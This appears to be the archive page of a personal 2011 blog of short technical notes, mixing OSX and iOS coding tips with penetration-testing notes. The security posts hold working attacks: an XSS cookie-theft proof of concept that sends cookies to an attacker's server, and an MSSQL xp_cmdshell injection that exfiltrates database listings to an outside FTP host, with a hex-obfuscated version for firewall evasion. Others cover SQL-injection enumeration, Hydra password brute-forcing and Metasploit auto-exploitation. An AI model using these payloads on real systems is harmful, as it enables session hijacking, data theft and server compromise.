Tuesday, December 13, 2011

Drawable mutations

http://www.curious-creature.org/2009/05/02/drawable-mutations/

Modifying one drawable when you do not want to modify another.
Posted by at No comments:

Tuesday, December 6, 2011

Enable/Disable slow motion on iPhone/iPad Simulator

Shift + Ctrl
Posted by at No comments:

Monday, November 7, 2011

Optimizing SSD on OSX

http://poller.se/2010/08/optimizing-mac-os-x-for-ssd-drives/
Posted by at No comments:

Saturday, November 5, 2011

Django and MySQL for Python on OSX Lion

Assuming Python and MySQL is already installed:

References:


python setup.py build
sh: mysql_config: command not found
Traceback (most recent call last):
File "setup.py", line 15, in
metadata, options = get_config()
File "/Users/dean/Downloads/MySQL-python-1.2.3/setup_posix.py", line 43, in get_config
libs = mysql_config("libs_r")
File "/Users/dean/Downloads/MySQL-python-1.2.3/setup_posix.py", line 24, in mysql_config
raise EnvironmentError("%s not found" % (mysql_config.path,))
EnvironmentError: mysql_config not found

If you are experiencing this error, follow these steps found here to resolve:


Excerpt:
In my case, I edited the setup_posix.py thusly:
# mysql_config.path = "mysql_config" mysql_config.path = "/usr/local/mysql-5.0.45-osx10.4-i686/bin/mysql_config"
Re-issue command:
python setup.py clean
ARCHFLAGS='-arch x86_64' python setup.py build
ARCHFLAGS='-arch x86_64' python setup.py install
sudo ln -s /usr/local/mysql/lib/ /usr/local/mysql/lib/mysql
Then test:
>>> import MySQLdb
Posted by at No comments:

Monday, September 26, 2011

Objective-C rightMouseDown event

Subclassing NSView, use the following method to invoke the right mouse down / control click event:

-(void) mouseDown:(NSEvent *)event{

if (event.modifierFlags & NSControlKeyMask)

return [self rightMouseDown:event];

}

Posted by at No comments:

Saturday, August 27, 2011

Metasploit Reference

Metasploit reference:
Posted by at No comments:

Wednesday, August 3, 2011

Import Nessus nbe into Mysql

Discovered this post here from Michael Holstein:

There is needed modification to get it working from 2006, here is the whole deal. Tested against BT4 (I know I'm behind). To run the script:

cat [nessus nbe file] | ./nessusimport.pl

Now, to get things set up see below. I apologize for the current formatting:

1. Create MYSQL database and create these tables:
CREATE TABLE ipmain (    idmain int(10) unsigned NOT NULL auto_increment,    mainip int(10) unsigned NOT NULL default '0',    lastnmap datetime NOT NULL default '0000-00-00 00:00:00',    lastnessus datetime NOT NULL default '0000-00-00 00:00:00',    ipowner varchar(40) default NULL,    PRIMARY KEY  (idmain),    KEY xip (mainip) ) TYPE=MyISAM;  
CREATE TABLE nessusresults (    idnessus int(10) unsigned NOT NULL auto_increment,    domain varchar(15) NOT NULL default '',    nessushost int(10) unsigned NOT NULL default '0',    service varchar(40) NOT NULL default '',    scriptid int(10) unsigned NOT NULL default '0',    risk tinyint(3) unsigned NOT NULL default '0',    timestamp datetime NOT NULL default '0000-00-00 00:00:00',    msg text,    PRIMARY KEY  (idnessus),    KEY xidnessus (idnessus),    KEY knessushost (nessushost),    KEY knessushost2 (nessushost,service) ) TYPE=MyISAM;  
CREATE TABLE nessusstats (    idstat int(10) unsigned NOT NULL auto_increment,    domain varchar(15) NOT NULL default '',    nessushost int(10) unsigned NOT NULL default '0',    service varchar(40) NOT NULL default '',    scriptid int(10) unsigned NOT NULL default '0',    risk tinyint(3) unsigned NOT NULL default '0',    timestamp datetime NOT NULL default '0000-00-00 00:00:00',    PRIMARY KEY  (idstat),    KEY xidstat (idstat),    KEY kstat (nessushost),    KEY kstst2 (nessushost,service) ) TYPE=MyISAM;
----------------------
2. Create the following perl script:
#!/usr/bin/perl
use Net::SMTP;
use Date::Manip;
our $TZ = 'US/Eastern';
use DBI();

#####DATABASE PARAMETERS#####

$DATABASE="DB GOES HERE";
$HOST="HOSTNAME GOES HERE";
$USERNAME="DB USERNAME GOES HERE";
$PASSWORD="DB PASSWORD GOES HERE";

#connect to the database server
#DBI->trace(1, "trace.log"); #uncomment to log all DBI stuff
$dbh = DBI->connect("DBI:mysql:database=$DATABASE;host=$HOST",
$USERNAME, $PASSWORD, {'RaiseError' => 1}) || die "Unable to connect:
$dbh->errstr\n";


######MAIN PROGRAM LOOP######

while ( )
{
@results = split '\||\|\|';
@results[6] =~ tr/;/\n/;
@results[6] =~ tr/"/'/;
@results[5] = "7";
#print @results[6];
# if(@results[6] =~ "Risk factor :\\\\n\\\\nCritical"){print @results[6];}
if(@results[6] =~ "Risk factor :\\\\n\\\\nCritical") {@results[5] = '1';}
if(@results[6] =~ "Risk factor :\\\\n\\\\nSerious") {@results[5] = '1';}
if(@results[6] =~ "Risk factor :\\\\n\\\\nHigh") {@results[5] = '1';}
if(@results[6] =~ "Risk factor :\\\\n\\\\nMedium") {@results[5] = '2';}
if(@results[6] =~ "Risk factor :\\\\n\\\\nMedium/Low") {@results[5] = '2';}
if(@results[6] =~ "Risk factor :\\\\n\\\\nLow/Medium") { @results[5] = '3';}
if(@results[6] =~ "Risk factor :\\\\n\\\\nLow") { @results[5] = '3';}

# @results[5] = '1' if (@results[6] =~ "Risk factor : Critical");
# @results[5] = '1' if (@results[6] =~ "Risk factor : Serious");
# @results[5] = '1' if (@results[6] =~ "Risk factor : High");
# @results[5] = '2' if (@results[6] =~ "Risk factor : Medium");
# @results[5] = '2' if (@results[6] =~ "Risk factor : Medium/Low");
# @results[5] = '3' if (@results[6] =~ "Risk factor : Low/Medium");
# @results[5] = '3' if (@results[6] =~ "Risk factor : Low");
@results[6] =~ `Risk factor : Critical`;
@results[6] =~ `Risk factor : High`;
@results[6] =~ `Risk factor : Serious`;
@results[6] =~ `Risk factor : Medium`;
@results[6] =~ `Risk factor : Medium/Low`;
@results[6] =~ `Risk factor : Low/Medium`;
@results[6] =~ `Risk factor : Low`;
for (@results[0]) { s/^\s+//;s/\s+$//; }
for (@results[1]) { s/^\s+//;s/\s+$//; }
for (@results[2]) { s/^\s+//;s/\s+$//; }
for (@results[3]) { s/^\s+//;s/\s+$//; }
for (@results[4]) { s/\
for (@results[5]) { s/^\s+//;s/\s+$//; }
for (@results[6]) { s/^\s+//;s/\s+$//;s/\'/\\'/g;}
my $ip = &dot2dec(@results[2]);
next unless ($ip > 0);
$timestamp = UnixDate(@results[4], '%Y-%m-%d %H:%M:%S');
&findmainip($ip);
#condition 1 (entry is a timestamp for end of host scan)
if (@results[0] eq "timestamps" and @results[3] =~ 'host_end|host_start') {
&updatemainip($ip,$timestamp);
#print "Condition 1 Matched\n";
}
#condition 2 (entry is a result record)
#print "testing: " . @results[0] ." and results 5: ".@results[5] . "\n";
if (@results[0] eq "results" and @results[5] < 7) {
&findnessustimestamp($ip);
&updatenessus(@results[1],$ip, @results[3], @results[4], @results[5], @nessustime[1], @results[6]);
&updatestats(@results[1],$ip, @results[3], @results[4], @results[5], @nessustime[1]);
}
else {
next;
}
}

#####GLOBAL SUBROUTINES#####

#turn dotted quad into decimal
sub dot2dec {
my $address = @_[0];
($a, $b, $c, $d) = split '\.', $address;
$decimal = $d + ($c * 256) + ($b * 256**2) + ($a * 256**3);
return $decimal;
}

#turn decimal into dotted
sub dec2dot {
my $address = @_[0];
$d = $address % 256; $address -= $d; $address /= 256;
$c = $address % 256; $address -= $c; $address /= 256;
$b = $address % 256; $address -= $b; $address /= 256;
$a = $address;
$dotted="$a.$b.$c.$d";
return $dotted;
}

#find IP in master table
sub findmainip {
my $query = $dbh->prepare("select idmain,mainip from ipmain
where mainip = '@_[0]'");
$query->execute || die "Unable to locate IP in table ipmain:
$dbh->errstr\n";
@mainip = $query->fetchrow_array;
return @mainip;
}

#update/add IP&timestamp in master table
sub updatemainip {
my $query = $dbh->prepare("select * from ipmain where
mainip=@_[0]");
$query->execute || die "Unable to locate IP in table ipmain:
$dbh->errstr\n";
@mainip = $query->fetchrow_array;
if (@mainip[0]) {
$dbh->do("update ipmain set lastnessus='@_[1]' where
idmain='@mainip[0]'") || die "problem with updatemainip 1:$dbh->errstr\n";
# print "updated values lastnessus=@_[1] where idmain=@mainip[0]\n";
}
else {
$dbh->do("insert into ipmain (mainip,lastnessus) values
('@_[0]','@_[1]')") || die "problem with updatemainip 2:$dbh->errstr\n";
# print "inserted values mainip=@_[0], lastnessus=@_[1]\n";
}
return;
}

#find last nessus timestamp for some IP
sub findnessustimestamp {
my $query = $dbh->prepare("select idmain,lastnessus from ipmain
where mainip='@_[0]'") || die "problem with findnessustimestamp:
$dbh->errstr\n";
$query->execute || die "Unable to locate nessus timestamp in
table ipmain: $dbh->errsrt\n";
@nessustime = $query->fetchrow_array;
return @nessustime;
}

#update/add nessus results records in nessusresults table
sub updatenessus {
my $query = $dbh->prepare("select * from nessusresults where nessushost='@_[1]' and scriptid='@_[3]'") || die "problem with updatenessus 1:$dbh->errstr\n";
print "prepared";
$query->execute || die "Unable to locate record in NessusResults: $dbh->errstr\n";
print "executed";
@nessus = $query->fetchrow_array;
if (@nessus[0]) {
$dbh->do("update nessusresults set domain='@_[0]',
nessushost='@_[1]', service='@_[2]', scriptid='@_[3]', risk='@_[4]',
timestamp='@_[5]', msg='@_[6]' where idnessus='@nessus[0]'") || die
"problem with updatenessus 2: $dbh->errstr\n";
# print "updated values domain=@_[0], host=@_[1], service=@_[2], script=@_[3], risk=@_[4], time=@_[5], msg=@_[6]\n";
}
else {
$dbh->do("insert into nessusresults
(domain,nessushost,service,scriptid,risk,timestamp,msg) values
('@_[0]','@_[1]','@_[2]','@_[3]','@_[4]','@_[5]','@_[6]')") || die
"problem with updatenessus 3: $dbh->errstr\n";
# print "inserted values domain=@_[0], host=@_[1], service=@_[2], script=@_[3], risk=@_[4], time=@_[5], msg=@_[6]\n";
}
return;
}

sub updatestats {
$dbh->do("insert into nessusstats
(domain,nessushost,service,scriptid,risk,timestamp) values
('@_[0]','@_[1]','@_[2]','@_[3]','@_[4]','@_[5]')") || die "problem with
updatestats 1: $dbh->errsrt\n";
# print "inserted stats values domain=@_[0], host=@_[1], service=@_[2], script=@_[3], risk=@_[4], time=@_[5]\n";
return;
}



Posted by at No comments:

Wednesday, July 13, 2011

Exploit exception: Login Failed: The server responded with unimplemented command 0 with WordCount 0

If experiencing in Metasploit (for example utilizing MS08-067)
" Exploit exception: Login Failed: The server responded with unimplemented command 0 with WordCount 0 "

Try:
> set SMBDirect false
Posted by at No comments:

Tuesday, July 12, 2011

Facts and Myths about Anti-Virus Evasion

http://schierlm.users.sourceforge.net/avevasion.html
Posted by at No comments:

Thursday, June 16, 2011

Pentest bookmarks

http://code.google.com/p/pentest-bookmarks/wiki/BookmarksList
Posted by at No comments:

Tuesday, May 31, 2011

Another way of removing AV

Posted by at No comments:

Wednesday, May 25, 2011

Accessing OSX and iOS Syslog via ASL

http://www.cocoanetics.com/2011/03/accessing-the-ios-system-log/

Posted by at No comments:

Friday, May 6, 2011

Metasploit db_autopwn (Postgres)

Step 1: Get/view active database driver.
msf exploit(psexec) > db_driver
[*] Active Driver: postgresql
[*] Available: postgresql

[*] DB Support: Enable the mysql driver with the following command:
[*] $ gem install mysql
[*] This gem requires mysqlclient headers, which can be installed on Ubuntu with:
[*] $ sudo apt-get install libmysqlclient-dev

Step 2: Connect to the local database.
msf exploit(psexec) > db_connect postgres@localhost
NOTICE: CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
NOTICE: CREATE TABLE will create implicit sequence "clients_id_seq" for serial column "clients.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "clients_pkey" for table "clients"
NOTICE: CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"

...

Step 3: nmap, enumerate the services of target system(s)
msf exploit(psexec) > db_nmap [target]
[*] Nmap: Starting Nmap 5.21 ( http://nmap.org ) at 2011-05-06 15:55 EDT
[*] Nmap: Nmap scan report for [target])
[*] Nmap: Host is up (0.021s latency).
[*] Nmap: Not shown: 995 filtered ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 25/tcp open smtp
[*] Nmap: 110/tcp open pop3
[*] Nmap: 143/tcp open imap
[*] Nmap: 443/tcp open https
[*] Nmap: 993/tcp open imaps

Step 4: auto exploit
msf exploit(psexec) > db_autopwn -p -t -e -b



Posted by at No comments:

Monday, May 2, 2011

How to steal cookies via XSS

This is a proof of concept demonstrating the the fundamental of stealing cookies via XSS:

There are two parts:

1. The attacker's server that will store the stolen credentials.
2. The vulnerable server that we will be injecting into to steal the session.

Part 1:
This is the code on the server for storing credentials (in PHP). The filename is "malicious.php"

$fp = fopen("/tmp/tokens.txt", "w");
fwrite($fp, $_GET['code']);
fclose($fp);


As you can see, all the server code is take in a $_GET request, and writes the attribute 'code' from the $_GET request variable.

Part 2:

In a server that is vulnerable to XSS, input the following malicious code:

<script>new Image().src='[malicious_host]/malicious.php?code='%2Bdocument.cookie</script>

or

<script>document.write('<img src="http://localhost/~dliu/malicious.php?code='%2Bdocument.cookie%2B'">')</script>


The following code creates an image with the source pointing to our malicious server. The request populates the GET variable "code" which the server is expecting to read and write.
Posted by at No comments:

Monday, April 11, 2011

4Shadow

OSX IDS
Posted by at No comments:

Thursday, April 7, 2011

Clear NSUserDefaults

The following will clear all saved preferences:

[[NSUserDefaults standardUserDefaults] setPersistentDomain:[NSDictionary dictionary] forName:[[NSBundle mainBundle] bundleIdentifier]];
Posted by at No comments:

Monday, April 4, 2011

MS-SQL Injection through errors

The following is a very very rough outline draft, I will fill in the details at a later date:

Sqlmap (also found on BackTrack OS) performs the following similar payload to generate MSSQL errors. I've found that at times sqlmap will fail for my needs, thus knowing how to manually perform the injection helps.

For example, we know the following form is vulnerable to a SQL injection utilizing the following payload:

1);WAITFOR DELAY '0:0:9'--

We can proceed with the following injection techniques to generate some useful information. The following was devised after many testings:

) UNION SELECT 1,2,3,4,5,6,7,8 FROM DATABASE..invoice WHERE 1953=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(117)+CHAR(121)+CHAR(58)+("+qryarg+")+CHAR(58)+CHAR(107)+CHAR(106)+CHAR(113)+CHAR(58))) AND (7022=7022)--

We use 8 columns because the unknown vulnerable query is pulling 8 columns. Therefore we need to match the amount of columns. The number of columns was found through SQL injection messages.

We then substitute our qryarg with the query we are interested in.

for i in range(1,500):
qryarg="SELECT TOP 1 name FROM (SELECT TOP "+str(i)+" name FROM master..sysdatabases ORDER BY name ASC) sq ORDER BY name DESC"

This will loop through each request and enumerate the database.

Then we start enumerating table names based on the found database names:

SELECT TOP 1 name FROM (SELECT TOP "+ str(i) +" name FROM DATABASE..sysobjects WHERE xtype = 'U' ORDER BY name ASC) sq ORDER BY name DESC

etc with columns, then actual rows.
Posted by at No comments:

Wednesday, March 9, 2011

Hydra-THC HTTP Basic Auth

hydra -L users.lst -P passwords.txt -t12 -f www.site.org http-head / -V
Posted by at No comments:

Python tricks

Small notes to myself:

chr() command is used to convert int to character. CHAR is the syntax used in MSSQL, when analyzing the query you can add an additional mapping of the command with:

>>> CHAR=chr

Now you can perform the following command:

>>>CHAR()
Posted by at No comments:

Wednesday, March 2, 2011

SQL Injection to Compromise OS

MSSQL Injection example to communicate with FTP server. The following POC can be extended to download/upload and execute Metasploit payloads to perform backdoors and reverse tcp connections. Discovered this with a customer who was directly compromised by this very attack vector:

Requirements: MSSQL running on System level (or equivalent) privileges. Where xp_* has not been ripped out.

Here is the query in its entirety:

Note: Replace ftp.microsoft.com with your FTP server, and user and password with your username and password.
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; exec master..xp_cmdshell 'mkdir temp& (echo open ftp.microsoft.com& echo user& echo password& echo binary& echo lcd temp& echo put file.txt file.txt& echo bye)>temp\ftpcommand.txt & (bcp "select name,dbid,crdate from master.dbo.sysdatabases" queryout b.txt -c -T & type b.txt& del b.txt) > temp\file.txt 2>&1 & ftp -s:temp\f3.txt & rmdir /S /Q temp';--

Break down:

Step 1 : Enable xp_cmdshell which is disabled by default on many SQL servers (2005):
sp_configure 'show advanced options', 1;
RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Step 2: Create temporary directory:
exec master..xp_cmdshell 'mkdir temp&

Step 3: Create preset of FTP commands for execution. We will see this in the next step.
(echo open ftp.microsoft.com& echo user& echo password& echo binary& echo lcd temp& echo put file.txt file.txt& echo bye)>temp\ftpcommand.txt &

Step 4: Query MSSQL to show all Database and pipe into file.txt. FTP results to your server given the commands we created in Step 3:
(bcp "select name,dbid,crdate from master.dbo.sysdatabases" queryout b.txt -c -T & type b.txt& del b.txt) > temp\file.txt 2>&1 & ftp -s:temp\ftpcommand.txt & rmdir /S /Q temp';--

Recap:
This command essentially create a temporary directory "temp", pipes in a preset of FTP commands to upload file file.txt. It will then run a SQL query to pipe in the list database command into the temporary file. This file is then uploaded to the FTP server via ftp -s:temp\f3.txt which is the preset FTP commands defined. Subsequent clean up at the end (rmdir).

You can obviously expand this to upload/download backdoors to initiate reverse_tcp connections.

Additionally, some trivial obfuscation to mask the query with a hex encode, store it in a variable, then pipe that variable into "exec" to bypass primitive application firewalls that may key off on basic search strings:

declare @q varchar(8000) select @q = 0x455845432073705f636f6e666967757265202773686f7720616476616e636564206f7074696f6e73272c20313b5245434f4e4649475552453b455845432073705f636f6e666967757265202778705f636d647368656c6c272c20313b5245434f4e4649475552453b2065786563206d61737465722e2e78705f636d647368656c6c20276d6b6469722074656d702620286563686f206f70656e206674702e6d6963726f736f66742e636f6d26206563686f207573657226206563686f2070617373776f726426206563686f2062696e61727926206563686f206c63642074656d7026206563686f207075742066696c652e7478742066696c652e74787426206563686f20627965293e74656d705c667470636f6d6d616e642e74787420262028626370202273656c656374206e616d652c646269642c6372646174652066726f6d206d61737465722e64626f2e737973646174616261736573222071756572796f757420622e747874202d63202d542026207479706520622e747874262064656c20622e74787429203e2074656d705c66696c652e74787420323e2631202620667470202d733a74656d705c66332e747874202620726d646972202f53202f512074656d70273b2d2d exec(@q)
Posted by at No comments:
Labels:

Monday, February 28, 2011

Global variables in OSX

http://www.learningiphone.com/2009/09/creating-a-global-object-in-objective-c/
Posted by at No comments:

Saturday, February 19, 2011

OSX Convert audio formats

Example of converting to .caff:

afconvert -f caff -d LEI16@44100 -c 1 [input] [output]
Posted by at No comments:

Friday, January 28, 2011

Reverse Engineering HolisticInfoSec

http://holisticinfosec.blogspot.com/2010/09/everybody-loves-remnux.html
Posted by at No comments:

Thursday, January 27, 2011

GPG Manual

Nice cheat sheet:

GPG Manual
Posted by at No comments:
Subscribe to: Posts (Atom)